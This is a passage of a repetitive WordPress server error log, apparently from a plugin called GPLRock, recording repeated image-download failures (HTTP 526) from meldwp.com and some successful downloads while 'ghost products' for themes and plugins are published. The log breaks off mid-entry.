pagebolt-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:27 UTC] GPLRock: Image download failed for product pagebolt-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pagebolt---landing-page-wordpress-theme-17804.webp for product pagebolt-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:29 UTC] GPLRock: Image download failed for product pagebolt-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:32 UTC] GPLRock: Image download failed for product pagebolt-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pagebolt---landing-page-wordpress-theme-17804.webp for product pagebolt-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:34 UTC] GPLRock WARNING: Image download failed for product pagebolt-landing-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pagebolt---landing-page-wordpress-theme-17804.webp [05-Apr-2026 14:33:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pagebolt-landing-page-wordpress-theme [05-Apr-2026 14:33:34 UTC] GPLRock: Image downloaded successfully for product bauman-creative-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38df7fca.webp [05-Apr-2026 14:33:34 UTC] GPLRock: Using pre-downloaded image for product bauman-creative-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38df7fca.webp [05-Apr-2026 14:33:34 UTC] GPLRock: Ghost product published with image - Product ID: bauman-creative-portfolio-wordpress-theme [05-Apr-2026 14:33:34 UTC] GPLRock: Image download failed for product roofx-roofing-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:36 UTC] GPLRock: Image download failed for product roofx-roofing-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roofx---roofing-services-wordpress-theme-22601.webp for product roofx-roofing-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:38 UTC] GPLRock: Image download failed for product roofx-roofing-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:40 UTC] GPLRock: Image download failed for product roofx-roofing-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roofx---roofing-services-wordpress-theme-22601.webp for product roofx-roofing-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:42 UTC] GPLRock WARNING: Image download failed for product roofx-roofing-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/roofx---roofing-services-wordpress-theme-22601.webp [05-Apr-2026 14:33:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: roofx-roofing-services-wordpress-theme [05-Apr-2026 14:33:43 UTC] GPLRock: Image download failed for product burst-creative-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:45 UTC] GPLRock: Image download failed for product burst-creative-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/burst---creative-design-agency-wordpress-theme-8724.webp for product burst-creative-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:47 UTC] GPLRock: Image download failed for product burst-creative-design-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:49 UTC] GPLRock: Image download failed for product burst-creative-design-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/burst---creative-design-agency-wordpress-theme-8724.webp for product burst-creative-design-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:51 UTC] GPLRock WARNING: Image download failed for product burst-creative-design-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/burst---creative-design-agency-wordpress-theme-8724.webp [05-Apr-2026 14:33:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: burst-creative-design-agency-wordpress-theme [05-Apr-2026 14:33:51 UTC] GPLRock: Image download failed for product ruffer-roof-construction-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:53 UTC] GPLRock: Image download failed for product ruffer-roof-construction-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ruffer---roof-construction--repair-wordpress-theme-24037.webp for product ruffer-roof-construction-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:33:56 UTC] GPLRock: Image download failed for product ruffer-roof-construction-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:33:58 UTC] GPLRock: Image download failed for product ruffer-roof-construction-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ruffer---roof-construction--repair-wordpress-theme-24037.webp for product ruffer-roof-construction-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:00 UTC] GPLRock WARNING: Image download failed for product ruffer-roof-construction-repair-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ruffer---roof-construction--repair-wordpress-theme-24037.webp [05-Apr-2026 14:34:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ruffer-roof-construction-repair-wordpress-theme [05-Apr-2026 14:34:00 UTC] GPLRock: Image download failed for product builderplus-building-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:02 UTC] GPLRock: Image download failed for product builderplus-building-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/builderplus---building--construction-wordpress-theme-6158.webp for product builderplus-building-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:04 UTC] GPLRock: Image download failed for product builderplus-building-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:06 UTC] GPLRock: Image download failed for product builderplus-building-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/builderplus---building--construction-wordpress-theme-6158.webp for product builderplus-building-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:08 UTC] GPLRock WARNING: Image download failed for product builderplus-building-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/builderplus---building--construction-wordpress-theme-6158.webp [05-Apr-2026 14:34:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: builderplus-building-construction-wordpress-theme [05-Apr-2026 14:34:09 UTC] GPLRock: Image download failed for product typer-multi-author-publishing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:11 UTC] GPLRock: Image download failed for product typer-multi-author-publishing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/typer---multi-author-publishing-wordpress-theme-18252.webp for product typer-multi-author-publishing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:13 UTC] GPLRock: Image download failed for product typer-multi-author-publishing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:15 UTC] GPLRock: Image download failed for product typer-multi-author-publishing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/typer---multi-author-publishing-wordpress-theme-18252.webp for product typer-multi-author-publishing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:17 UTC] GPLRock WARNING: Image download failed for product typer-multi-author-publishing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/typer---multi-author-publishing-wordpress-theme-18252.webp [05-Apr-2026 14:34:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: typer-multi-author-publishing-wordpress-theme [05-Apr-2026 14:34:18 UTC] GPLRock: Image download failed for product inoterior-architecture-interior-designer-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:20 UTC] GPLRock: Image download failed for product inoterior-architecture-interior-designer-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inoterior---architecture--interior-designer-wordpress-theme--rtl-19921.webp for product inoterior-architecture-interior-designer-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:22 UTC] GPLRock: Image download failed for product inoterior-architecture-interior-designer-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:24 UTC] GPLRock: Image download failed for product inoterior-architecture-interior-designer-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inoterior---architecture--interior-designer-wordpress-theme--rtl-19921.webp for product inoterior-architecture-interior-designer-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:26 UTC] GPLRock WARNING: Image download failed for product inoterior-architecture-interior-designer-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/inoterior---architecture--interior-designer-wordpress-theme--rtl-19921.webp [05-Apr-2026 14:34:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: inoterior-architecture-interior-designer-wordpress-theme-rtl [05-Apr-2026 14:34:26 UTC] GPLRock: Image download failed for product constructor-construction-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:29 UTC] GPLRock: Image download failed for product constructor-construction-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/constructor--construction-wordpress-12969.webp for product constructor-construction-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:31 UTC] GPLRock: Image download failed for product constructor-construction-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:33 UTC] GPLRock: Image download failed for product constructor-construction-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:34:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/constructor--construction-wordpress-12969.webp for product constructor-construction-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:34:35 UTC] GPLRock WARNING: Image download failed for product constructor-construction-wordpress. URL: https://meldwp.com/wp-content/uploads/constructor--construction-wordpress-12969.webp [05-Apr-2026 14:34:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: constructor-construction-wordpress [05-Apr-2026 14:35:24 UTC] GPLRock: Image download failed for product luxcut-hair-salons-and-hairdressers-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:26 UTC] GPLRock: Image download failed for product luxcut-hair-salons-and-hairdressers-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxcut---hair-salons-and-hairdressers-wordpress-theme-28489.webp for product luxcut-hair-salons-and-hairdressers-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:35:28 UTC] GPLRock: Image download failed for product luxcut-hair-salons-and-hairdressers-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:30 UTC] GPLRock: Image download failed for product luxcut-hair-salons-and-hairdressers-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxcut---hair-salons-and-hairdressers-wordpress-theme-28489.webp for product luxcut-hair-salons-and-hairdressers-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:35:32 UTC] GPLRock WARNING: Image download failed for product luxcut-hair-salons-and-hairdressers-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luxcut---hair-salons-and-hairdressers-wordpress-theme-28489.webp [05-Apr-2026 14:35:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxcut-hair-salons-and-hairdressers-wordpress-theme [05-Apr-2026 14:35:33 UTC] GPLRock: Image download failed for product autodoc-car-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:35 UTC] GPLRock: Image download failed for product autodoc-car-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autodoc---car-repair-wordpress-theme-6174.webp for product autodoc-car-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:35:37 UTC] GPLRock: Image download failed for product autodoc-car-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:39 UTC] GPLRock: Image download failed for product autodoc-car-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autodoc---car-repair-wordpress-theme-6174.webp for product autodoc-car-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:35:41 UTC] GPLRock WARNING: Image download failed for product autodoc-car-repair-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autodoc---car-repair-wordpress-theme-6174.webp [05-Apr-2026 14:35:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autodoc-car-repair-wordpress-theme [05-Apr-2026 14:35:42 UTC] GPLRock: Image download failed for product able-pro-bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:44 UTC] GPLRock: Image download failed for product able-pro-bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/able-pro--bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboar-664.webp for product able-pro-bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:35:46 UTC] GPLRock: Image download failed for product able-pro-bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:48 UTC] GPLRock: Image download failed for product able-pro-bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/able-pro--bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboar-664.webp for product able-pro-bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:35:50 UTC] GPLRock WARNING: Image download failed for product able-pro-bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboard-template. URL: https://meldwp.com/wp-content/uploads/able-pro--bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboar-664.webp [05-Apr-2026 14:35:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: able-pro-bootstrap-tailwind-react-nextjs-angular-vue-asp-laravel-admin-dashboard-template [05-Apr-2026 14:35:50 UTC] GPLRock: Image download failed for product thegem-creative-multi-purpose-psd-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:53 UTC] GPLRock: Image download failed for product thegem-creative-multi-purpose-psd-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thegem---creative-multi-purpose-psd-template-12263.webp for product thegem-creative-multi-purpose-psd-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:35:55 UTC] GPLRock: Image download failed for product thegem-creative-multi-purpose-psd-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:57 UTC] GPLRock: Image download failed for product thegem-creative-multi-purpose-psd-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:35:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thegem---creative-multi-purpose-psd-template-12263.webp for product thegem-creative-multi-purpose-psd-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:35:59 UTC] GPLRock WARNING: Image download failed for product thegem-creative-multi-purpose-psd-template. URL: https://meldwp.com/wp-content/uploads/thegem---creative-multi-purpose-psd-template-12263.webp [05-Apr-2026 14:35:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: thegem-creative-multi-purpose-psd-template [05-Apr-2026 14:35:59 UTC] GPLRock: Image downloaded successfully for product gymo-gym-fitness-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78faaa59.webp [05-Apr-2026 14:35:59 UTC] GPLRock: Using pre-downloaded image for product gymo-gym-fitness-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-78faaa59.webp [05-Apr-2026 14:35:59 UTC] GPLRock: Ghost product published with image - Product ID: gymo-gym-fitness-wordpress-theme [05-Apr-2026 14:35:59 UTC] GPLRock: Image download failed for product mediadesk-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:01 UTC] GPLRock: Image download failed for product mediadesk-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mediadesk---magazine-wordpress-theme-27528.webp for product mediadesk-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:04 UTC] GPLRock: Image download failed for product mediadesk-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:06 UTC] GPLRock: Image download failed for product mediadesk-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mediadesk---magazine-wordpress-theme-27528.webp for product mediadesk-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:08 UTC] GPLRock WARNING: Image download failed for product mediadesk-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mediadesk---magazine-wordpress-theme-27528.webp [05-Apr-2026 14:36:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mediadesk-magazine-wordpress-theme [05-Apr-2026 14:36:08 UTC] GPLRock: Image download failed for product finance-consultant-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:10 UTC] GPLRock: Image download failed for product finance-consultant-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finance-consultant---consulting-wordpress-theme-15186.webp for product finance-consultant-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:12 UTC] GPLRock: Image download failed for product finance-consultant-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:14 UTC] GPLRock: Image download failed for product finance-consultant-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finance-consultant---consulting-wordpress-theme-15186.webp for product finance-consultant-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:17 UTC] GPLRock WARNING: Image download failed for product finance-consultant-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/finance-consultant---consulting-wordpress-theme-15186.webp [05-Apr-2026 14:36:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finance-consultant-consulting-wordpress-theme [05-Apr-2026 14:36:17 UTC] GPLRock: Image download failed for product agencium-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:19 UTC] GPLRock: Image download failed for product agencium-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agencium--creative-agency--portfolio-wordpress-theme-32997.webp for product agencium-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:21 UTC] GPLRock: Image download failed for product agencium-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:23 UTC] GPLRock: Image download failed for product agencium-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agencium--creative-agency--portfolio-wordpress-theme-32997.webp for product agencium-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:25 UTC] GPLRock WARNING: Image download failed for product agencium-creative-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agencium--creative-agency--portfolio-wordpress-theme-32997.webp [05-Apr-2026 14:36:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agencium-creative-agency-portfolio-wordpress-theme [05-Apr-2026 14:36:25 UTC] GPLRock: Image download failed for product plank-carpenter-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:28 UTC] GPLRock: Image download failed for product plank-carpenter-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plank---carpenter--landscaping-wordpress-theme-33327.webp for product plank-carpenter-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:30 UTC] GPLRock: Image download failed for product plank-carpenter-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:32 UTC] GPLRock: Image download failed for product plank-carpenter-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plank---carpenter--landscaping-wordpress-theme-33327.webp for product plank-carpenter-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:34 UTC] GPLRock WARNING: Image download failed for product plank-carpenter-landscaping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/plank---carpenter--landscaping-wordpress-theme-33327.webp [05-Apr-2026 14:36:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: plank-carpenter-landscaping-wordpress-theme [05-Apr-2026 14:36:34 UTC] GPLRock: Image download failed for product ipress-blogmagzinenews-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:36 UTC] GPLRock: Image download failed for product ipress-blogmagzinenews-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ipress---blogmagzinenews-wordpress-theme-10519.webp for product ipress-blogmagzinenews-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:38 UTC] GPLRock: Image download failed for product ipress-blogmagzinenews-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:41 UTC] GPLRock: Image download failed for product ipress-blogmagzinenews-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:36:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ipress---blogmagzinenews-wordpress-theme-10519.webp for product ipress-blogmagzinenews-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:36:43 UTC] GPLRock WARNING: Image download failed for product ipress-blogmagzinenews-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ipress---blogmagzinenews-wordpress-theme-10519.webp [05-Apr-2026 14:36:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ipress-blogmagzinenews-wordpress-theme [05-Apr-2026 14:37:55 UTC] GPLRock: Image downloaded successfully for product userpro-dashboard (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e78002d7.jpg [05-Apr-2026 14:37:55 UTC] GPLRock: Using pre-downloaded image for product userpro-dashboard: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e78002d7.jpg [05-Apr-2026 14:37:55 UTC] GPLRock: Ghost product published with image - Product ID: userpro-dashboard [05-Apr-2026 14:37:58 UTC] GPLRock: Image downloaded successfully for product storefront-parallax-hero (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-43e961f4.jpg [05-Apr-2026 14:37:58 UTC] GPLRock: Using pre-downloaded image for product storefront-parallax-hero: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-43e961f4.jpg [05-Apr-2026 14:37:58 UTC] GPLRock: Ghost product published with image - Product ID: storefront-parallax-hero [05-Apr-2026 14:38:00 UTC] GPLRock: Image downloaded successfully for product mythemeshop-saturation-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-43fe9b54.jpg [05-Apr-2026 14:38:00 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-saturation-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-43fe9b54.jpg [05-Apr-2026 14:38:00 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-saturation-wordpress-theme [05-Apr-2026 14:38:01 UTC] GPLRock: Image downloaded successfully for product css-igniter-public-opinion-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f6291ede.jpg [05-Apr-2026 14:38:02 UTC] GPLRock: Using pre-downloaded image for product css-igniter-public-opinion-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f6291ede.jpg [05-Apr-2026 14:38:02 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-public-opinion-wordpress-theme [05-Apr-2026 14:38:03 UTC] GPLRock: Image downloaded successfully for product woocommerce-authorize-net-reporting (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2fc270c.jpg [05-Apr-2026 14:38:03 UTC] GPLRock: Using pre-downloaded image for product woocommerce-authorize-net-reporting: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2fc270c.jpg [05-Apr-2026 14:38:03 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-authorize-net-reporting [05-Apr-2026 14:38:04 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-message (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05c6480e.jpg [05-Apr-2026 14:38:05 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-message: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05c6480e.jpg [05-Apr-2026 14:38:05 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-message [05-Apr-2026 14:38:06 UTC] GPLRock: Image downloaded successfully for product eventon-qr-code (attempt 1) to: 